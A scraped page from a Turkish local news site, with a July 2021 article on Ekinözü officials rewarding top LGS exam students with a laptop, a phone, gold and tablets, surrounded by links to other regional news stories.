<a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980_1.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kisitlamasiz-ilk-bayram-heyecani-carsi-pazara-da-yansidi-h70651.html" title="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/07/kısıtlama.jpg" alt="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı" />
      <div class="caption">Kısıtlamasız ilk bayram heyecanı çarşı...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/elbistan-muzik-ve-sanat-bayrami-icin-gun-sayiyor-h70648.html" title="Elbistan, müzik ve sanat bayramı için gün sayıyor" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/07/elbistan-festivali.jpg" alt="Elbistan, müzik ve sanat bayramı için gün sayıyor" />
      <div class="caption">Elbistan, müzik ve sanat bayramı...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/arilar-kentin-en-islek-caddesinde-agaca-ogul-verdi-h70646.html" title="Arılar kentin en işlek caddesinde ağaca oğul verdi" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/07/005.jpg" alt="Arılar kentin en işlek caddesinde ağaca oğul verdi" />
      <div class="caption">Arılar kentin en işlek caddesinde...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/polisten-bayrama-magdur-girmeyin-uyarisi-h70640.html" title="Polisten ‘bayrama mağdur girmeyin’ uyarısı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/07/001_3.jpg" alt="Polisten ‘bayrama mağdur girmeyin’ uyarısı" />
      <div class="caption">Polisten ‘bayrama mağdur girmeyin’ uyarısı</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/bayrami-guvenle-karsilayalim-cagrisi-h70639.html" title="“Bayramı güvenle karşılayalım” çağrısı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/07/aşı.jpg" alt="“Bayramı güvenle karşılayalım” çağrısı" />
      <div class="caption">“Bayramı güvenle karşılayalım” çağrısı</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kentpark-kurban-bayramı-bilgisayar.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">LGS’de başarılı olan öğrenciler ödüllendirildi</h1>
                <h2 class="lead" itemprop="description"><strong>Ekinözü ilçesinde Liselere Geçiş Sistemi (LGS) kapsamında düzenlenen merkezi sınavda dereceye girerek başarılı olan öğrencilere diz üstü bilgisayar ve tablet hediye edildi.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-07-17 16:45:34" content="2021-07-17T16:45:34+02:00">17 Temmuz 2021 Cumartesi 16:45</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" alt="LGS’de başarılı olan öğrenciler ödüllendirildi" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-70650"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Ekinözü Kaymakamı Muhammed Huzeyfe Onur, Liselere Geçiş Sistemi (LGS) kapsamında yapılan merkezi sınavda ilçe birinciliğini elde eden ve başarılı olan 11 öğrenciyi makamında misafir etti. Ekinözü Belediye Başkanı Bilal Eker ve İlçe Milli Eğitim Müdürü Hüseyin Turaç’ın da katıldığı programda Ekinözü LGS 1’incisi olan öğrenciye; Ekinözü Kaymakamlığı tarafından diz üstü bilgisayar, Ekinözü Belediyesi tarafından telefon ve İlçe Milli Eğitim Müdürlüğü tarafından da altın hediye edildi. Ayrıca sınavda başarı elde eden 10 öğrenciye de Ekinözü Belediyesi tarafından tablet hediye edildi.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Ekinözü Kaymakamı Muhammed Huzeyfe Onur, Ekinözü Belediye başkanı Bilal Eker ve İlçe Milli Eğitim Müdürü Hüseyin Turaç, öğrencilere bundan sonraki eğitim hayatlarına başarılar diledi.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="http://www.elbistaninsesi.com/images/upload/lgs-odul-1.jpg"></img></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="http://www.elbistaninsesi.com/images/upload/lgs-odul-2.jpg"></img></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="http://www.elbistaninsesi.com/images/upload/lgs-odul-3.jpg"></img></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="http://www.elbistaninsesi.com/images/upload/lgs-odul-4.jpg"></img></span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="http://www.elbistaninsesi.com/images/upload/lgs-odul-5.jpg"></img></span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"><img class="detayFoto" src="http://www.elbistaninsesi.com/images/upload/lgs-odul-6.jpg"></img></span></span></p>

<p></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.elbistaninsesi.com/guncel/kisitlamasiz-ilk-bayram-heyecani-carsi-pazara-da-yansidi-h70651.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kuraklik-magduru-ciftcinin-gozu-kulagi-tarsimde-h70649.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-muzik-ve-sanat-bayrami-icin-gun-sayiyor-h70648.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/arilar-kentin-en-islek-caddesinde-agaca-ogul-verdi-h70646.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/total-kalitesi-ve-ayricaligi-elbistanda-h70643.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/4kattaki-evinin-penceresinden-dusen-38-yasindaki-adam-hayatini-h70642.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/polisten-bayrama-magdur-girmeyin-uyarisi-h70640.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bayrami-guvenle-karsilayalim-cagrisi-h70639.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bir-kirsal-mahalleye-daha-yeni-kopru-h70638.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/goksunda-tesis-kurma-sartli-maden-ihalesi-h70637.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/akdo-cafe-ve-restauranta-gorkemli-acilis-h70636.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/muhtar-gunesten-buyuksehire-yol-tesekkuru-h70635.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kazada-agir-yaralanan-14-yasindaki-fatma-nur-hayata-tutunamadi-h70632.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistandan-turkiye-gecilmez-mesaji-h70631.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/sehit-kabirleri-ziyaret-edildi-h70630.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-saticilarina-16-yil-ceza-h70629.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bahcesehir-elbistan-kampusu-yilsonu-degerlendirme-toplantisi-yapti-h70628.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/mehmet-mihci-demirciler-ve-tamirciler-odasi-icin-adayligini-h70627.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozu-ndeki-kazadaolu-sayisi-3-e-yukseldi-h70626.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanli-sube-mudurunun-gorevden-alinmasina-tepki-yagiyor-h70625.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-tiras-sahadete-cesaretle-yuruyen-bir-millet-asla-yenilmez-h70623.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kavurucu-sicakliklar-geliyor-39-dereceyi-gorecegiz-h70619.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/33-mahallede-800-kinali-keklik-dogaya-kanat-cirpti-h70615.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmarasta-haftalik-vaka-sayisi-yukseldi-h70622.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.elbistaninsesi.com/guncel/kisitlamasiz-ilk-bayram-heyecani-carsi-pazara-da-yansidi-h70651.html" title="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/kisitlamasiz_ilk_bayram_heyecani_carsi_pazara_da_yansidi_h70651_2df20.jpg" alt="Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kısıtlamasız ilk bayram heyecanı çarşı pazara da yansıdı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/lgsde-basarili-olan-ogrenciler-odullendirildi-h70650.html" title="LGS’de başarılı olan öğrenciler ödüllendirildi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/lgsde_basarili_olan_ogrenciler_odullendirildi_h70650_117ad.jpg" alt="LGS’de başarılı olan öğrenciler ödüllendirildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">LGS’de başarılı olan öğrenciler ödüllendirildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kuraklik-magduru-ciftcinin-gozu-kulagi-tarsimde-h70649.html" title="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/kuraklik_magduru_ciftcinin_gozu_kulagi_tarsimde_h70649_31a60.jpg" alt="Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kuraklık mağduru çiftçinin gözü kulağı TARSİM’de</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistan-muzik-ve-sanat-bayrami-icin-gun-sayiyor-h70648.html" title="Elbistan, müzik ve sanat bayramı için gün sayıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/elbistan_muzik_ve_sanat_bayrami_icin_gun_sayiyor_h70648_917b8.jpg" alt="Elbistan, müzik ve sanat bayramı için gün sayıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan, müzik ve sanat bayramı için gün sayıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/arilar-kentin-en-islek-caddesinde-agaca-ogul-verdi-h70646.html" title="Arılar kentin en işlek caddesinde ağaca oğul verdi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/arilar_kentin_en_islek_caddesinde_agaca_ogul_verdi_h70646_ed720.jpg" alt="Arılar kentin en işlek caddesinde ağaca oğul verdi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Arılar kentin en işlek caddesinde ağaca oğul verdi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/total-kalitesi-ve-ayricaligi-elbistanda-h70643.html" title="TOTAL kalitesi ve ayrıcalığı Elbistan’da">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/total_kalitesi_ve_ayricaligi_elbistanda_h70643_15782.jpg" alt="TOTAL kalitesi ve ayrıcalığı Elbistan’da" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">TOTAL kalitesi ve ayrıcalığı Elbistan’da</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/4kattaki-evinin-penceresinden-dusen-38-yasindaki-adam-hayatini-h70642.html" title="4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını kaybetti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/4kattaki_evinin_penceresinden_dusen_38_yasindaki_adam_hayatini_kaybetti_h70642_876b7.jpg" alt="4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını kaybetti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">4.kattaki evinin penceresinden düşen 38 yaşındaki adam hayatını kaybetti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/polisten-bayrama-magdur-girmeyin-uyarisi-h70640.html" title="Polisten ‘bayrama mağdur girmeyin’ uyarısı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/polisten_bayrama_magdur_girmeyin_uyarisi_h70640_9d504.jpg" alt="Polisten ‘bayrama mağdur girmeyin’ uyarısı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Polisten ‘bayrama mağdur girmeyin’ uyarısı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bayrami-guvenle-karsilayalim-cagrisi-h70639.html" title="“Bayramı güvenle karşılayalım” çağrısı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/bayrami_guvenle_karsilayalim_cagrisi_h70639_4f8aa.jpg" alt="“Bayramı güvenle karşılayalım” çağrısı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">“Bayramı güvenle karşılayalım” çağrısı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bir-kirsal-mahalleye-daha-yeni-kopru-h70638.html" title="Bir kırsal mahalleye daha yeni köprü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/bir_kirsal_mahalleye_daha_yeni_kopru_h70638_4f9ab.jpg" alt="Bir kırsal mahalleye daha yeni köprü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bir kırsal mahalleye daha yeni köprü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/goksunda-tesis-kurma-sartli-maden-ihalesi-h70637.html" title="Göksun’da tesis kurma şartlı maden ihalesi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/goksunda_tesis_kurma_sartli_maden_ihalesi_h70637_9a9b2.jpg" alt="Göksun’da tesis kurma şartlı maden ihalesi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Göksun’da tesis kurma şartlı maden ihalesi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/akdo-cafe-ve-restauranta-gorkemli-acilis-h70636.html" title="AKDO Cafe ve Restaurant’a görkemli açılış">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/akdo_cafe_ve_restauranta_gorkemli_acilis_h70636_ac537.JPG" alt="AKDO Cafe ve Restaurant’a görkemli açılış" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">AKDO Cafe ve Restaurant’a görkemli açılış</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/muhtar-gunesten-buyuksehire-yol-tesekkuru-h70635.html" title="Muhtar Güneş’ten Büyükşehir’e yol teşekkürü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/muhtar_gunesten_buyuksehire_yol_tesekkuru_h70635_5fbb1.jpg" alt="Muhtar Güneş’ten Büyükşehir’e yol teşekkürü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Muhtar Güneş’ten Büyükşehir’e yol teşekkürü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kazada-agir-yaralanan-14-yasindaki-fatma-nur-hayata-tutunamadi-h70632.html" title="Kazada ağır yaralanan 14 yaşındaki Fatma Nur, hayata tutunamadı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/kazada_agir_yaralanan_9_yasindaki_fatma_nur_hayata_tutunamadi_h70632_ebf63.jpg" alt="Kazada ağır yaralanan 14 yaşındaki Fatma Nur, hayata tutunamadı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kazada ağır yaralanan 14 yaşındaki Fatma Nur, hayata tutunamadı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistandan-turkiye-gecilmez-mesaji-h70631.html" title="Elbistan’dan ‘Türkiye Geçilmez’ mesajı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/elbistandan_turkiye_gecilmez_mesaji_h70631_5dd7f.jpg" alt="Elbistan’dan ‘Türkiye Geçilmez’ mesajı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’dan ‘Türkiye Geçilmez’ mesajı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/sehit-kabirleri-ziyaret-edildi-h70630.html" title="Şehit kabirleri ziyaret edildi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/sehit_kabirleri_ziyaret_edildi_h70630_4bb76.jpg" alt="Şehit kabirleri ziyaret edildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Şehit kabirleri ziyaret edildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-saticilarina-16-yil-ceza-h70629.html" title="Uyuşturucu satıcılarına 16 yıl ceza">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/uyusturucu_saticilarina_16_yil_ceza_h70629_b3625.jpg" alt="Uyuşturucu satıcılarına 16 yıl ceza" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Uyuşturucu satıcılarına 16 yıl ceza</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bahcesehir-elbistan-kampusu-yilsonu-degerlendirme-toplantisi-yapti-h70628.html" title="Bahçeşehir Elbistan Kampüsü yılsonu değerlendirme toplantısı yaptı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/bahcesehir_elbistan_kampusu_yilsonu_degerlendirme_toplantisi_yapti_h70628_fd44f.jpg" alt="Bahçeşehir Elbistan Kampüsü yılsonu değerlendirme toplantısı yaptı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bahçeşehir Elbistan Kampüsü yılsonu değerlendirme toplantısı yaptı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/mehmet-mihci-demirciler-ve-tamirciler-odasi-icin-adayligini-h70627.html" title="Mehmet Mıhçı, Demirciler ve Tamirciler Odası için adaylığını açıkladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/mehmet_mihci_demirciler_ve_tamirciler_odasi_icin_adayligini_acikladi_h70627_35e11.JPG" alt="Mehmet Mıhçı, Demirciler ve Tamirciler Odası için adaylığını açıkladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Mehmet Mıhçı, Demirciler ve Tamirciler Odası için adaylığını açıkladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ekinozu-ndeki-kazadaolu-sayisi-3-e-yukseldi-h70626.html" title="Ekinözü&#039;ndeki kazada ölü sayısı 3&#039;e yükseldi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/ekinozu_ndeki_kazadaolu_sayisi_3_e_yukseldi_h70626_15439.jpg" alt="Ekinözü&#039;ndeki kazada ölü sayısı 3&#039;e yükseldi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ekinözü&#039;ndeki kazada ölü sayısı 3&#039;e yükseldi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanli-sube-mudurunun-gorevden-alinmasina-tepki-yagiyor-h70625.html" title="Elbistanlı şube müdürünün görevden alınmasına tepki yağıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/elbistanli_sube_mudurunun_gorev_alinmasina_tepki_yagiyor_h70625_ea3cc.jpg" alt="Elbistanlı şube müdürünün görevden alınmasına tepki yağıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanlı şube müdürünün görevden alınmasına tepki yağıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-tiras-sahadete-cesaretle-yuruyen-bir-millet-asla-yenilmez-h70623.html" title="Başkan Tıraş: “Şahadete cesaretle yürüyen bir millet asla yenilmez”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/baskan_tiras_sahadete_cesaretle_yuruyen_bir_millet_asla_yenilmez_h70623_dba47.JPG" alt="Başkan Tıraş: “Şahadete cesaretle yürüyen bir millet asla yenilmez”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Tıraş: “Şahadete cesaretle yürüyen bir millet asla yenilmez”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kavurucu-sicakliklar-geliyor-39-dereceyi-gorecegiz-h70619.html" title="Kavurucu sıcaklıklar geliyor 39 dereceyi göreceğiz">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/07/kavurucu_sicakliklar_geliyor_39_dereceyi_gorecegiz_h70619_ff290.jpg" alt="Kavurucu sıcaklıklar geliyor 39 dereceyi göreceğiz" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kavurucu sıcaklıklar geliyor 39 dereceyi göreceğiz</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
